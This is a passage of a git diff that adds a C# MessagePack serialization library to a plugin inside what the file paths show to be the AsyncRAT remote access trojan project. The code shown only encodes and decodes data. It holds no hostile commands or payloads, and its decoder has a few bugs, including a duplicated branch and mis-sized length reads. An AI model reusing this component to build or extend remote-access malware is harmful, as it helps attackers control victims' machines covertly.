+ return InnerAddArrayChild();
+ }
+
+ private void WriteMap(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x80 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDE;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDF;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+ for (int i = 0; i < len; i++)
+ {
+ WriteTools.WriteString(ms, children[i].name);
+ children[i].Encode2Stream(ms);
+ }
+ }
+
+ private void WirteArray(Stream ms)
+ {
+ byte b;
+ byte[] lenBytes;
+ int len = children.Count;
+ if (len <= 15)
+ {
+ b = (byte)(0x90 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDC;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDD;
+ ms.WriteByte(b);
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+
+
+ for (int i = 0; i < len; i++)
+ {
+ ((MsgPack)children[i]).Encode2Stream(ms);
+ }
+ }
+
+ public void SetAsInteger(Int64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Integer;
+ }
+
+ public void SetAsUInt64(UInt64 value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.UInt64;
+ }
+
+ public UInt64 GetAsUInt64()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToUInt64((Int64)this.innerValue);
+ case MsgPackType.UInt64:
+ return (UInt64)this.innerValue;
+ case MsgPackType.String:
+ return UInt64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToUInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToUInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToUInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+
+ }
+
+ public Int64 GetAsInteger()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return (Int64)this.innerValue;
+ case MsgPackType.UInt64:
+ return Convert.ToInt64((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Int64.Parse(this.innerValue.ToString().Trim());
+ case MsgPackType.Float:
+ return Convert.ToInt64((Double)this.innerValue);
+ case MsgPackType.Single:
+ return Convert.ToInt64((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+ public Double GetAsFloat()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return Convert.ToDouble((Int64)this.innerValue);
+ case MsgPackType.String:
+ return Double.Parse((String)this.innerValue);
+ case MsgPackType.Float:
+ return (Double)this.innerValue;
+ case MsgPackType.Single:
+ return (Single)this.innerValue;
+ case MsgPackType.DateTime:
+ return Convert.ToInt64((DateTime)this.innerValue);
+ default:
+ return 0;
+ }
+ }
+
+
+ public void SetAsBytes(byte[] value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.Binary;
+ }
+
+ public byte[] GetAsBytes()
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Integer:
+ return BitConverter.GetBytes((Int64)this.innerValue);
+ case MsgPackType.String:
+ return BytesTools.GetUtf8Bytes(this.innerValue.ToString());
+ case MsgPackType.Float:
+ return BitConverter.GetBytes((Double)this.innerValue);
+ case MsgPackType.Single:
+ return BitConverter.GetBytes((Single)this.innerValue);
+ case MsgPackType.DateTime:
+ long dateval = ((DateTime)this.innerValue).ToBinary();
+ return BitConverter.GetBytes(dateval);
+ case MsgPackType.Binary:
+ return (byte[])this.innerValue;
+ default:
+ return new byte[] { };
+ }
+ }
+
+ public void Add(string key, String value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsString(value);
+ }
+
+ public void Add(string key, int value)
+ {
+ MsgPack tmp = InnerAddArrayChild();
+ tmp.name = key;
+ tmp.SetAsInteger(value);
+ }
+
+ public bool LoadFileAsBytes(string fileName)
+ {
+ if (File.Exists(fileName))
+ {
+ byte[] value = null;
+ FileStream fs = new FileStream(fileName, FileMode.Open, FileAccess.Read, FileShare.Read);
+ value = new byte[fs.Length];
+ fs.Read(value, 0, (int)fs.Length);
+ fs.Close();
+ fs.Dispose();
+ SetAsBytes(value);
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+
+ }
+
+ public bool SaveBytesToFile(string fileName)
+ {
+ if (this.innerValue != null)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Append);
+ fs.Write(((byte[])this.innerValue), 0, ((byte[])this.innerValue).Length);
+ fs.Close();
+ fs.Dispose();
+ return true;
+ }
+ else
+ {
+ return false;
+ }
+ }
+
+ public MsgPack ForcePathObject(string path)
+ {
+ MsgPack tmpParent, tmpObject;
+ tmpParent = this;
+ string[] pathList = path.Trim().Split(new Char[] { '.', '/', '\\' });
+ string tmp = null;
+ if (pathList.Length == 0)
+ {
+ return null;
+ }
+ else if (pathList.Length > 1)
+ {
+ for (int i = 0; i < pathList.Length - 1; i++)
+ {
+ tmp = pathList[i];
+ tmpObject = tmpParent.FindObject(tmp);
+ if (tmpObject == null)
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ }
+ else
+ {
+ tmpParent = tmpObject;
+ }
+ }
+ }
+ tmp = pathList[pathList.Length - 1];
+ int j = tmpParent.IndexOf(tmp);
+ if (j > -1)
+ {
+ return tmpParent.children[j];
+ }
+ else
+ {
+ tmpParent = tmpParent.InnerAddMapChild();
+ tmpParent.SetName(tmp);
+ return tmpParent;
+ }
+ }
+
+ public void SetAsNull()
+ {
+ Clear();
+ this.innerValue = null;
+ this.valueType = MsgPackType.Null;
+ }
+
+ public void SetAsString(String value)
+ {
+ this.innerValue = value;
+ this.valueType = MsgPackType.String;
+ }
+
+ public String GetAsString()
+ {
+ if (this.innerValue == null)
+ {
+ return "";
+ }
+ else
+ {
+ return this.innerValue.ToString();
+ }
+
+ }
+
+ public void SetAsBoolean(Boolean bVal)
+ {
+ this.valueType = MsgPackType.Boolean;
+ this.innerValue = bVal;
+ }
+
+ public void SetAsSingle(Single fVal)
+ {
+ this.valueType = MsgPackType.Single;
+ this.innerValue = fVal;
+ }
+
+ public void SetAsFloat(Double fVal)
+ {
+ this.valueType = MsgPackType.Float;
+ this.innerValue = fVal;
+ }
+
+
+
+ public void DecodeFromBytes(byte[] bytes)
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ ms.Write(bytes, 0, bytes.Length);
+ ms.Position = 0;
+ DecodeFromStream(ms);
+ }
+ }
+
+ public void DecodeFromFile(string fileName)
+ {
+ FileStream fs = new FileStream(fileName, FileMode.Open);
+ DecodeFromStream(fs);
+ fs.Dispose();
+ }
+
+
+
+ public void DecodeFromStream(Stream ms)
+ {
+ byte lvByte = (byte)ms.ReadByte();
+ byte[] rawByte = null;
+ MsgPack msgPack = null;
+ int len = 0;
+ int i = 0;
+
+ if (lvByte <= 0x7F)
+ { //positive fixint 0xxxxxxx 0x00 - 0x7f
+ SetAsInteger(lvByte);
+ }
+ else if ((lvByte >= 0x80) && (lvByte <= 0x8F))
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ len = lvByte - 0x80;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0x90) && (lvByte <= 0x9F)) //fixarray 1001xxxx 0x90 - 0x9f
+ {
+ //fixmap 1000xxxx 0x80 - 0x8f
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ len = lvByte - 0x90;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if ((lvByte >= 0xA0) && (lvByte <= 0xBF)) // fixstr 101xxxxx 0xa0 - 0xbf
+ {
+ len = lvByte - 0xA0;
+ SetAsString(ReadTools.ReadString(ms, len));
+ }
+ else if ((lvByte >= 0xE0) && (lvByte <= 0xFF))
+ { /// -1..-32
+ // negative fixnum stores 5-bit negative integer
+ // +--------+
+ // |111YYYYY|
+ // +--------+
+ SetAsInteger((sbyte)lvByte);
+ }
+ else if (lvByte == 0xC0)
+ {
+ SetAsNull();
+ }
+ else if (lvByte == 0xC1)
+ {
+ throw new Exception("(never used) type $c1");
+ }
+ else if (lvByte == 0xC2)
+ {
+ SetAsBoolean(false);
+ }
+ else if (lvByte == 0xC3)
+ {
+ SetAsBoolean(true);
+ }
+ else if (lvByte == 0xC4)
+ { // max 255
+ len = ms.ReadByte();
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC5)
+ { // max 65535
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToUInt16(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if (lvByte == 0xC6)
+ { // binary max: 2^32-1
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ // read binary
+ rawByte = new byte[len];
+ ms.Read(rawByte, 0, len);
+ SetAsBytes(rawByte);
+ }
+ else if ((lvByte == 0xC7) || (lvByte == 0xC8) || (lvByte == 0xC9))
+ {
+ throw new Exception("(ext8,ext16,ex32) type $c7,$c8,$c9");
+ }
+ else if (lvByte == 0xCA)
+ { // float 32
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+
+ SetAsSingle(BitConverter.ToSingle(rawByte, 0));
+ }
+ else if (lvByte == 0xCB)
+ { // float 64
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsFloat(BitConverter.ToDouble(rawByte, 0));
+ }
+ else if (lvByte == 0xCC)
+ { // uint8
+ // uint 8 stores a 8-bit unsigned integer
+ // +--------+--------+
+ // | 0xcc |ZZZZZZZZ|
+ // +--------+--------+
+ lvByte = (byte)ms.ReadByte();
+ SetAsInteger(lvByte);
+ }
+ else if (lvByte == 0xCD)
+ { // uint16
+ // uint 16 stores a 16-bit big-endian unsigned integer
+ // +--------+--------+--------+
+ // | 0xcd |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xCE)
+ {
+ // uint 32 stores a 32-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xce |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToUInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xCF)
+ {
+ // uint 64 stores a 64-bit big-endian unsigned integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xcf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsUInt64(BitConverter.ToUInt64(rawByte, 0));
+ }
+ else if (lvByte == 0xDC)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdc |YYYYYYYY|YYYYYYYY| N objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDD)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdd |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Array;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xD9)
+ {
+ // str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ // +--------+--------+========+
+ // | 0xd9 |YYYYYYYY| data |
+ // +--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDE)
+ {
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xde |YYYYYYYY|YYYYYYYY| N*2 objects |
+ // +--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt16(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDF)
+ {
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ // | 0xdf |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ| N*2 objects |
+ // +--------+--------+--------+--------+--------+~~~~~~~~~~~~~~~~~+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ len = BitConverter.ToInt32(rawByte, 0);
+
+ this.Clear();
+ this.valueType = MsgPackType.Map;
+ for (i = 0; i < len; i++)
+ {
+ msgPack = InnerAdd();
+ msgPack.SetName(ReadTools.ReadString(ms));
+ msgPack.DecodeFromStream(ms);
+ }
+ }
+ else if (lvByte == 0xDA)
+ {
+ // str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ // +--------+--------+--------+========+
+ // | 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ // +--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xDB)
+ {
+ // str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ // +--------+--------+--------+--------+--------+========+
+ // | 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ // +--------+--------+--------+--------+--------+========+
+ SetAsString(ReadTools.ReadString(lvByte, ms));
+ }
+ else if (lvByte == 0xD0)
+ {
+ // int 8 stores a 8-bit signed integer
+ // +--------+--------+
+ // | 0xd0 |ZZZZZZZZ|
+ // +--------+--------+
+ SetAsInteger((sbyte)ms.ReadByte());
+ }
+ else if (lvByte == 0xD1)
+ {
+ // int 16 stores a 16-bit big-endian signed integer
+ // +--------+--------+--------+
+ // | 0xd1 |ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+
+ rawByte = new byte[2];
+ ms.Read(rawByte, 0, 2);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt16(rawByte, 0));
+ }
+ else if (lvByte == 0xD2)
+ {
+ // int 32 stores a 32-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+
+ // | 0xd2 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+
+ rawByte = new byte[4];
+ ms.Read(rawByte, 0, 4);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt32(rawByte, 0));
+ }
+ else if (lvByte == 0xD3)
+ {
+ // int 64 stores a 64-bit big-endian signed integer
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ // | 0xd3 |ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|ZZZZZZZZ|
+ // +--------+--------+--------+--------+--------+--------+--------+--------+--------+
+ rawByte = new byte[8];
+ ms.Read(rawByte, 0, 8);
+ rawByte = BytesTools.SwapBytes(rawByte);
+ SetAsInteger(BitConverter.ToInt64(rawByte, 0));
+ }
+ }
+
+ public byte[] Encode2Bytes()
+ {
+ using (MemoryStream ms = new MemoryStream())
+ {
+ Encode2Stream(ms);
+ byte[] r = new byte[ms.Length];
+ ms.Position = 0;
+ ms.Read(r, 0, (int)ms.Length);
+ return r;
+ }
+ }
+
+ public void Encode2Stream(Stream ms)
+ {
+ switch (this.valueType)
+ {
+ case MsgPackType.Unknown:
+ case MsgPackType.Null:
+ WriteTools.WriteNull(ms);
+ break;
+ case MsgPackType.String:
+ WriteTools.WriteString(ms, (String)this.innerValue);
+ break;
+ case MsgPackType.Integer:
+ WriteTools.WriteInteger(ms, (Int64)this.innerValue);
+ break;
+ case MsgPackType.UInt64:
+ WriteTools.WriteUInt64(ms, (UInt64)this.innerValue);
+ break;
+ case MsgPackType.Boolean:
+ WriteTools.WriteBoolean(ms, (Boolean)this.innerValue);
+ break;
+ case MsgPackType.Float:
+ WriteTools.WriteFloat(ms, (Double)this.innerValue);
+ break;
+ case MsgPackType.Single:
+ WriteTools.WriteFloat(ms, (Single)this.innerValue);
+ break;
+ case MsgPackType.DateTime:
+ WriteTools.WriteInteger(ms, GetAsInteger());
+ break;
+ case MsgPackType.Binary:
+ WriteTools.WriteBinary(ms, (byte[])this.innerValue);
+ break;
+ case MsgPackType.Map:
+ WriteMap(ms);
+ break;
+ case MsgPackType.Array:
+ WirteArray(ms);
+ break;
+ default:
+ WriteTools.WriteNull(ms);
+ break;
+ }
+ }
+
+ public String AsString
+ {
+ get
+ {
+ return GetAsString();
+ }
+ set
+ {
+ SetAsString(value);
+ }
+ }
+
+ public Int64 AsInteger
+ {
+ get { return GetAsInteger(); }
+ set { SetAsInteger((Int64)value); }
+ }
+
+ public Double AsFloat
+ {
+ get { return GetAsFloat(); }
+ set { SetAsFloat(value); }
+ }
+ public MsgPackArray AsArray
+ {
+ get
+ {
+ lock (this)
+ {
+ if (refAsArray == null)
+ {
+ refAsArray = new MsgPackArray(this, children);
+ }
+ }
+ return refAsArray;
+ }
+ }
+
+
+ public MsgPackType ValueType
+ {
+ get { return valueType; }
+ }
+
+
+ IEnumerator IEnumerable.GetEnumerator()
+ {
+ return new MsgPackEnum(children);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/MsgPackType.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/MsgPackType.cs
new file mode 100644
index 0000000..2567ae6
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/MsgPackType.cs
@@ -0,0 +1,24 @@
+using System;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ public enum MsgPackType
+ {
+ Unknown = 0,
+ Null = 1,
+ Map = 2,
+ Array = 3,
+ String = 4,
+ Integer = 5,
+ UInt64 = 6,
+ Boolean = 7,
+ Float = 8,
+ Single = 9,
+ DateTime = 10,
+ Binary = 11
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/ReadTools.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/ReadTools.cs
new file mode 100644
index 0000000..9e85968
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/ReadTools.cs
@@ -0,0 +1,84 @@
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Linq;
+using System.Text;
+using System.Threading.Tasks;
+
+namespace Plugin.MessagePack
+{
+ class ReadTools
+ {
+ public static String ReadString(Stream ms, int len)
+ {
+ byte[] rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+
+ public static String ReadString(Stream ms)
+ {
+ byte strFlag = (byte)ms.ReadByte();
+ return ReadString(strFlag, ms);
+ }
+
+ public static String ReadString(byte strFlag, Stream ms)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = null;
+ int len = 0;
+ if ((strFlag >= 0xA0) && (strFlag <= 0xBF))
+ {
+ len = strFlag - 0xA0;
+ }
+ else if (strFlag == 0xD9)
+ {
+ len = ms.ReadByte();
+ }
+ else if (strFlag == 0xDA)
+ {
+ rawBytes = new byte[2];
+ ms.Read(rawBytes, 0, 2);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToUInt16(rawBytes, 0);
+ }
+ else if (strFlag == 0xDB)
+ {
+ rawBytes = new byte[4];
+ ms.Read(rawBytes, 0, 4);
+ rawBytes = BytesTools.SwapBytes(rawBytes);
+ len = BitConverter.ToInt32(rawBytes, 0);
+ }
+ rawBytes = new byte[len];
+ ms.Read(rawBytes, 0, len);
+ return BytesTools.GetString(rawBytes);
+ }
+ }
+}
\ No newline at end of file
diff --git a/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/WriteTools.cs b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/WriteTools.cs
new file mode 100644
index 0000000..3de69fa
--- /dev/null
+++ b/AsyncRAT-C#/Plugin/ProcessManager/ProcessManager/MessagePack/WriteTools.cs
@@ -0,0 +1,199 @@
+using System;
+using System.IO;
+
+namespace Plugin.MessagePack
+{
+ class WriteTools
+ {
+ public static void WriteNull(Stream ms)
+ {
+ ms.WriteByte(0xC0);
+ }
+
+ public static void WriteString(Stream ms, String strVal)
+ {
+ //
+ //fixstr stores a byte array whose length is upto 31 bytes:
+ //+--------+========+
+ //|101XXXXX| data |
+ //+--------+========+
+ //
+ //str 8 stores a byte array whose length is upto (2^8)-1 bytes:
+ //+--------+--------+========+
+ //| 0xd9 |YYYYYYYY| data |
+ //+--------+--------+========+
+ //
+ //str 16 stores a byte array whose length is upto (2^16)-1 bytes:
+ //+--------+--------+--------+========+
+ //| 0xda |ZZZZZZZZ|ZZZZZZZZ| data |
+ //+--------+--------+--------+========+
+ //
+ //str 32 stores a byte array whose length is upto (2^32)-1 bytes:
+ //+--------+--------+--------+--------+--------+========+
+ //| 0xdb |AAAAAAAA|AAAAAAAA|AAAAAAAA|AAAAAAAA| data |
+ //+--------+--------+--------+--------+--------+========+
+ //
+ //where
+ //* XXXXX is a 5-bit unsigned integer which represents N
+ //* YYYYYYYY is a 8-bit unsigned integer which represents N
+ //* ZZZZZZZZ_ZZZZZZZZ is a 16-bit big-endian unsigned integer which represents N
+ //* AAAAAAAA_AAAAAAAA_AAAAAAAA_AAAAAAAA is a 32-bit big-endian unsigned integer which represents N
+ //* N is the length of data
+
+ byte[] rawBytes = BytesTools.GetUtf8Bytes(strVal);
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 31)
+ {
+ b = (byte)(0xA0 + (byte)len);
+ ms.WriteByte(b);
+ }
+ else if (len <= 255)
+ {
+ b = 0xD9;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xDA;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xDB;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+ public static void WriteBinary(Stream ms, byte[] rawBytes)
+ {
+
+ byte[] lenBytes = null;
+ int len = rawBytes.Length;
+ byte b = 0;
+ if (len <= 255)
+ {
+ b = 0xC4;
+ ms.WriteByte(b);
+ b = (byte)len;
+ ms.WriteByte(b);
+ }
+ else if (len <= 65535)
+ {
+ b = 0xC5;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int16)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ else
+ {
+ b = 0xC6;
+ ms.WriteByte(b);
+
+ lenBytes = BytesTools.SwapBytes(BitConverter.GetBytes((Int32)len));
+ ms.Write(lenBytes, 0, lenBytes.Length);
+ }
+ ms.Write(rawBytes, 0, rawBytes.Length);
+ }
+
+ public static void WriteFloat(Stream ms, Double fVal)
+ {
+ ms.WriteByte(0xCB);
+ ms.Write(BytesTools.SwapDouble(fVal), 0, 8);
+ }
+
+ public static void WriteSingle(Stream ms, Single fVal)
+ {
+ ms.WriteByte(0xCA);
+ ms.Write(BytesTools.SwapBytes(BitConverter.GetBytes(fVal)), 0, 4);
+ }
+
+ public static void WriteBoolean(Stream ms, Boolean bVal)
+ {
+ if (bVal)
+ {
+ ms.WriteByte(0xC3);
+ }
+ else
+ {
+ ms.WriteByte(0xC2);
+ }
+ }
+
+
+ public static void WriteUInt64(Stream ms, UInt64 iVal)
+ {
+ ms.WriteByte(0xCF);
+ byte[] dataBytes = BitConverter.GetBytes(iVal);
+ ms.Write(BytesTools.SwapBytes(dataBytes), 0, 8);
+ }
+
+ public static void WriteInteger(Stream ms, Int64 iVal)
+ {
+ if (iVal >= 0)
+ { // 正数
+ if (iVal <= 127)
+ {
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= 255)
+ { //UInt8
+ ms.WriteByte(0xCC);
+ ms.WriteByte((byte)iVal);
+ }
+ else if (iVal <= (UInt32)0xFFFF)
+ { //UInt16
+ ms.WriteByte(0xCD);
+ ms.Write(BytesTools.SwapInt16((Int16)iVal), 0, 2);
+ }
+ else if (iVal <= (UInt32)0xFFFFFFFF)
+ { //UInt32
+ ms.WriteByte(0xCE);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
+ else
+ { //Int64
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ }
+ else
+ { // <0
+ if (iVal <= Int32.MinValue) //-2147483648 // 64 bit
+ {
+ ms.WriteByte(0xD3);
+ ms.Write(BytesTools.SwapInt64(iVal), 0, 8);
+ }
+ else if (iVal <= Int16.MinValue) // -32768 // 32 bit
+ {
+ ms.WriteByte(0xD2);
+ ms.Write(BytesTools.SwapInt32((Int32)iVal), 0, 4);
+ }
